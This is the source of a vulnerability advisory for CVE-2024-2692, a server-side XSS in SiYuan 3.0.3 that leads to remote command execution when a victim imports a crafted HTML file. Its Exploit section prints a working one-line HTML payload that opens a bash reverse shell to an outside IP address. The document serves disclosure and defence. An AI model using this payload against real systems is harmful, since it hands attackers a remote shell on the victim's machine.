---
slug: advisories/dezco/
title: SiYuan 3.0.3 - RCE via Server Side XSS
authors: Carlos Bello
writer: cbello
codename: dezco
product: SiYuan 3.0.3 - RCE via Server Side XSS
date: 2024-04-03 12:00 COT
cveid: CVE-2024-2692
severity: 9.6
description: SiYuan 3.0.3 - Remote Command Execution via Server Side XSS
keywords: Fluid Attacks, Security, Vulnerabilities, RCE, Si Yuan, XSS, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="SiYuan 3.0.3 - RCE via Server Side XSS"
    code="[Stones](https://en.wikipedia.org/wiki/The_Rolling_Stones)"
    product="SiYuan"
    affected-versions="Version 3.0.3"
    fixed-versions=""
    state="Public"
    release="2024-04-03">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Server Side XSS"
    rule="[425. Server Side XSS](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-425/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
    score="9.6"
    available="Yes"
    id="[CVE-2024-2692](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2692)">
</vulnerability-table>

## Description

SiYuan version 3.0.3 allows executing arbitrary commands on the server.
This is possible because the application is vulnerable to Server Side XSS.

## Vulnerability

A remote code execution vulnerability has been identified in SiYuan.
This is possible when the victim imports a file containing a malicious HTML
payload defined within it.

## Exploit

```html
<img src="1" onerror="require('child_process').exec('bash -i >& /dev/tcp/24.144.86.165/4444 0>&1');"/>
```

## Evidence of exploitation

<iframe src="https://shorturl.at/hqA25"
width="835" height="504" frameborder="0" title="RCE-Si-Yuan-3.0.3"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2024-2692 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: SiYuan 3.0.3

* Operating System: MacOS

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/siyuan-note/siyuan/>

## Timeline

<time-lapse
  discovered="2024-03-18"
  contacted="2024-03-19"
  replied=""
  confirmed=""
  patched=""
  disclosure="2024-04-03">
</time-lapse>
